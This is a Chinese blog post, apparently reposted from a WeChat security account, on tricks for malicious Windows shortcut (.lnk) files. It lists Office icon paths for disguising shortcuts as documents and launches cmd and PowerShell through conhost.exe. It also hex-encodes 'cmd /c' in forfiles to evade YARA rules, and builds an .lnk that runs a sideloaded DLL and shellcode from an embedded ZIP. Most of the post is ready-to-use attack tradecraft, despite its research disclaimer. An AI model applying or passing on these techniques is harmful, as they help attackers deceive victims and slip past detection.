修改你Lnk文件的图标
如下图标路径,只要对方安装了Office一般路径是不会改变的。
access = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}accicons.exe"
excel = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}xlicons.exe"
lync = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}lyncicon.exe"
office = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}ohub32.exe",56
onedrive = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}grv_icons.exe"
onenote = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}joticon.exe"
outlook = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}outicon.exe"
powerpoint = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}pptico.exe"
project = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}pj11icon.exe"
publisher = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}pubs.exe"
visio = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}visicon.exe"
word = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}wordicon.exe"
使用Lnk来运行你的powershell或CMD
需要注意的是不要直接去运行powershell或CMD,可以使用const来去运行。
C:windowssystem32conhost.exe conhost conhost conhost conhost conhost conhost cmd /c notepad
C:windowssystem32conhost.exe conhost conhost conhost conhost conhost conhost powershell ...
使用Forfiles运行
因为Forfiles支持16进制编码,可以帮助我们逃避一些Yara规则。
forfiles.exe /p c:windowssystem32 /m user32.dll /c "0x630x6d0x640x200x2f0x63 notepad | calc
这里的0x630x6d0x640x200x2f0x63 其实就是cmd /c
如下进程链:
Lnk执行ZIP中恶意程序
Lnk中执行ZIP中的恶意程序,这里思路是这样的,我们在ZIP中使用白加黑的方式,将白程序和黑DLL以及shellcode压缩成ZIP文件。
然后使用Lnk文件去调用。
这里使用到如下工具:
https://www.x86matthew.com/view_post?id=embed_exe_lnk
使用cl.exe编译之后 然后使用如下命令制作恶意.lnk,在这之前需要将白程序打包成一个zip文件。
然后如下命令去生成arp.lnk。第一个参数表示你压缩的zip文件,第二个参数表示你要生成的.lnk名称,第三个参数表示你要执行zip压缩包中的那个程序。
可以看到成功调用。
LnkAndZip.exe arp.zip arp.lnk arphaCrashReport64.exe "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}wordicon.exe"
这里图标没有显示出来的原因是,我这个虚拟机没有装Office。
将文件拉到我物理机可以看到已经有word图标了。
ZIP压缩包中的文件:
如下攻击链:
Lnk --> arp.zip --> arphaCrashReport64.exe --> arphaDump64.dll --> ...这里可以写shellcode
原文始发于微信公众号(Relay学安全):关于Lnk攻击的一些技巧
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论